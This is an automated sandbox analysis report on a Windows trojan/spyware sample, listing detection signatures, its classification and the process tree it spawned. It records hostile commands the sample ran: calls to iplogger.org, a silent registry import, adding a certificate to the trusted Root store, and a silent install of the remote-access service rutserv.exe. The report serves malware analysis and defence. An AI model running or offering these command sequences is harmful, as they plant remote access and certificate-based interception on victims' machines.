Creates a DirectInput object (often for capturing keystrokes)

Source: ssevs.exe, 00000016.00000002.482511545.0000000001458000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Drops certificate files (DER)

Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp

File created: C:\ProgramData\Immunity\CertMgry\is-I14BP.tmp

Jump to dropped file

System Summary:

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		17_2_004A0E24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		19_2_005ECBC0

Creates files inside the system directory

Source: C:\Windows\System32\cmd.exe

File created: C:\Windows

Detected potential crypto function

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4C36C	0_2_00D4C36C
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4ED38	0_2_00D4ED38
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0488	0_2_04DC0488
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC1C8B	0_2_04DC1C8B
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0478	0_2_04DC0478
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC06F8	0_2_04DC06F8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC06E9	0_2_04DC06E9
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC5A38	0_2_04DC5A38
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEF668	0_2_04DEF668
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE90F8	0_2_04DE90F8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEA140	0_2_04DEA140
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DECED0	0_2_04DECED0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE6F60	0_2_04DE6F60
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE2A50	0_2_04DE2A50
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DED0B8	0_2_04DED0B8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DED0A8	0_2_04DED0A8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEE3DF	0_2_04DEE3DF
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEE3E0	0_2_04DEE3E0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEF350	0_2_04DEF350
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 2_2_00FBD7F0	2_2_00FBD7F0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 2_2_00FBCAB8	2_2_00FBCAB8
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004254D0	17_2_004254D0
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040ECB4	17_2_0040ECB4
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00431F50	17_2_00431F50
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0064022C	19_2_0064022C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0041073E	19_2_0041073E
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040AFF4	19_2_0040AFF4
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301EA60	22_2_0301EA60
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301EA70	22_2_0301EA70
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301CA7C	22_2_0301CA7C
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07696FD0	22_2_07696FD0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A618	22_2_0769A618
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07691C78	22_2_07691C78
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690B60	22_2_07690B60
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07692B90	22_2_07692B90
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076912B0	22_2_076912B0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076961D8	22_2_076961D8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690040	22_2_07690040
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07696FC0	22_2_07696FC0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697FA9	22_2_07697FA9
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697FB0	22_2_07697FB0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A609	22_2_0769A609
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694E00	22_2_07694E00
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694568	22_2_07694568
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694578	22_2_07694578
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694DF0	22_2_07694DF0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07691C6A	22_2_07691C6A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697498	22_2_07697498
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A368	22_2_0769A368
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07692B7A	22_2_07692B7A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769AB42	22_2_0769AB42
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A359	22_2_0769A359
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694BE0	22_2_07694BE0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694BD0	22_2_07694BD0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695278	22_2_07695278
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07699249	22_2_07699249
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07693A40	22_2_07693A40
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07699258	22_2_07699258
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07693A30	22_2_07693A30
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690AD1	22_2_07690AD1
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076912A1	22_2_076912A1
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695288	22_2_07695288
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697978	22_2_07697978
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A920	22_2_0769A920
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A930	22_2_0769A930
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076961C8	22_2_076961C8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697988	22_2_07697988
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769506A	22_2_0769506A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695078	22_2_07695078
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690006	22_2_07690006
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F53D48	23_2_00007FF7D9F53D48

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005EA59C appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005BC3D8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005D3750 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005F3814 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005D3A34 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005F3590 appears 39 times

PE file contains executable resources (Code or Archives)

Source: servs.tmp.17.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: servs.tmp.17.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

PE file contains more sections than normal

Source: is-PFD3D.tmp.19.dr

Static PE information: Number of sections : 17 > 10

PE file contains strange resources

Source: 1wOdXavtlE.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: servs.tmp.17.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMetroFramework.dll> vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000000.322469152.000000000036B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameIEFRAME.DLL.MUID vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.482401861.0000000001030000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename6Qgb9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532430822.00000000087F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530971740.00000000080C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.477691078.000000000080B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.492060863.0000000003C24000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.476252478.0000000000418000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe

Uses 32bit PE files

Source: 1wOdXavtlE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 1wOdXavtlE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.1wOdXavtlE.exe.400000.0.unpack, BrowserExtension/Data/Crypto/CryptoHelper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@50/66@28/9

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		17_2_004A0E24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		19_2_005ECBC0

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_0041A5FC GetDiskFreeSpaceW,

17_2_0041A5FC

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_00601290 GetVersion,CoCreateInstance,

19_2_00601290

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A16FC FindResourceW,SizeofResource,LoadResource,LockResource,

17_2_004A16FC

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1wOdXavtlE.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\ProgramData\Immunity\rutserv.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$694
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_01

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File created: C:\Users\user\AppData\Local\Temp\tmp379E.tmp

Jump to behavior

Source: Yara match	File source: 00000025.00000002.549143519.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.508478042.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Immunity\is-2SOD7.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''

Source: 1wOdXavtlE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\pass.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\pass.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Immunity\rutserv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Immunity\rutserv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 1wOdXavtlE.exe	Metadefender: Detection: 16%
Source: 1wOdXavtlE.exe	ReversingLabs: Detection: 58%

Source: servs.exe

String found in binary or memory: rting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked the co

Source: unknown	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe 'C:\Users\user\Desktop\1wOdXavtlE.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Process created: C:\ProgramData\pass.exe C:\ProgramData\pass.exe
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Source: C:\ProgramData\pass.exe	Process created: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp 'C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp' /SL5='$10584,9506241,724480,C:\ProgramData\pass.exe'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'regedit /s C:\ProgramData\Immunity\ses.reg'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\Immunity\install.cmd''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7	Jump to behavior
